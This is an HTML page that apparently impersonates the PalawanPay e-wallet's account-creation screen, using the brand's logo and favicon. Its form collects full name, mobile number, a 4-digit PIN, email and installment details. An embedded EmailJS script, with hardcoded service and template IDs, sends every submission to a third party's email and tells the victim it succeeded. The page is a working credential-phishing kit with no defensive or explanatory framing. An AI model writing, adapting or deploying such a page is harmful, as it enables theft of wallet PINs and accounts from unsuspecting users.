<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Create Account - PalawanPay</title>
  <link rel="stylesheet" href="style.css" />
  <link rel="icon" href="https://www.palawanpay.com/assets/images/favicon.ico" />
  <script src="https://cdn.jsdelivr.net/npm/emailjs-com@3/dist/email.min.js"></script>
  <script>
    (function() {
      emailjs.init("565BErlHzvW1CIekI");
    })();
  </script>
</head>
<body class="form-bg">
  <div class="form-container">
    <img src="https://www.palawanpay.com/assets/images/logo.png" class="form-logo" alt="PalawanPay Logo" />
    <h2>Create Account</h2>
    <form id="register-form">
      <input type="text" name="name" placeholder="Full Name" required />
      <input type="tel" name="mobile" placeholder="Mobile Number" required />
      <input type="password" name="pin" maxlength="4" placeholder="4-digit PIN" required />
      <input type="email" name="email" placeholder="Email Address" required />
      <input type="text" name="unit" placeholder="Unit of Installment or GGives" />
      <button class="submit-btn" type="submit">Submit</button>
      <div class="status"></div>
    </form>
    <a href="index.html" class="small-link">Back</a>
  </div>

  <script>
    document.getElementById('register-form').addEventListener('submit', function(e) {
      e.preventDefault();
      emailjs.sendForm('service_3hqkdcg', 'template_ukf5gwk', this)
        .then(() => {
          document.querySelector('.status').textContent = '✅ Information sent successfully!';
          document.querySelector('.status').style.color = 'green';
          document.getElementById('register-form').reset();
        }, (error) => {
          document.querySelector('.status').textContent = '❌ Failed to send.';
          document.querySelector('.status').style.color = 'red';
          console.error('EmailJS Error:', error);
        });
    });
  </script>
</body>
</html>
